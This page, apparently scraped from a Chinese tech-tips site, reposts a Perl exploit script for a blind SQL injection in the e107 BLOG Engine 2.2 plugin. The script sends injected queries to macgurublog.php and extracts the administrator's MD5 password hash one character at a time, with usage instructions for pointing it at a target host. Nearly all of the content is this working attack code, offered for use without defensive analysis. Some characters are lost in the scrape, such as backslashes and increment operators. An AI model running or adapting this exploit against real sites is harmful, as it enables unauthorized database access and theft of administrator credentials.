欢迎来到福编程网，本站提供各种互联网专业知识！

手机版

微信关注

快捷导航: 正则表达式 AJAX相关黑客相关相关技巧 Mysql MsSql MsSql2005 MsSql2008 MariaDB Oracle Access SQLite PostgreSQL MongoDB DB2 Redis 数据库文摘数据库其它 LINUX RedHat/Centos Ubuntu/Debian Fedora Solaris 红旗Linux Unix/BSD 苹果MAC 麒麟系统注册表 BIOS 系统安装系统进程 Fireworks教程

广告商业广告，理性选择

您的位置：网站首页 > 无法确定分类

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

发布时间：1970-01-01　作者：佚名　来源：互联网

标签：雪佛兰通用奢华劳斯莱斯旗舰版 64位收藏夹解调器

#!/usr/bin/perl######################################################################################e107PluginBLOGEnginev2.2BlindSQLInjectionExploit##..::virangarsecurityte

#!/usr/bin/perl

#####################################################################################

# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #

# ..::virangar security team::.. #

# www.virangar.net #

# C0d3d BY:virangar security team ( hadihadi ) #

#special tnx to: #

#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #

#& all virangar members & all hackerz #

# my lovely friends hadi_aryaie2004 & arash(imm02tal) #

# ..:::Young Iranina Hackerz::.. #

#####################################################################################

#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod ;)

#this code is for english e107's only,if you want work on other languages,you can edit line 67;) use HTTP::Request;

use LWP::UserAgent; if (@ARGV != 1){

header();

} $host = $ARGV[0]; print "n md5 Password:rn";

&halghe();

print "n[ ]Donen";

sub halghe {

for($i = 1; $i <= 32; $i ){

$f = 0;

$n = 48;

while(!$f && $n <= 57)

{

if(&inject($host, $i, $n,)){

$f = 1;

syswrite(STDOUT, chr($n), 1);

}

$n ;

}

if(!$f){

$n=97;

while(!$f && $n <= 102)

{

if(&inject($host, $i, $n,)){

$f = 1;

syswrite(STDOUT, chr($n), 1);

}

$n ;

}}

}

sub inject {

my $site = $_[0];

my $a = $_[1];

my $b = $_[2]; $col = "user_password"; $attack= "$site"." and substring((select "."$col"." from e107_user where user_id=1 limit 0,1),"."$a".",1)=char("."$b".")/*"; $b = LWP::UserAgent->new() or die "Could not initialize browsern";

$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$req = $b->request(HTTP::Request->new(GET=>$attack));

$res = $req->content; if ($res !~ /The user has hidden their blog./i){

return 1;

} }

sub header {

print qq{

###################################################################

# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #

# (just for english e107's) #

# www.virangar.net #

# Useage: perl $0 Host #

# #

# Host: full patch to macgurublog.php uid (dont forget http://) #

# #

# Example: #

# perl $0 http://site/macgurublog_menu/macgurublog.php?uid=5 #

# #

###################################################################

};

}

上一篇：IceBB

下一篇：Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)

广告商业广告，理性选择

网站首页

网络编程

数据库

操作系统

平面设计

网站运营

网络安全

电脑相关

手机学院

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

相关推荐

文章分类

热门关键词

热门文章

最新更新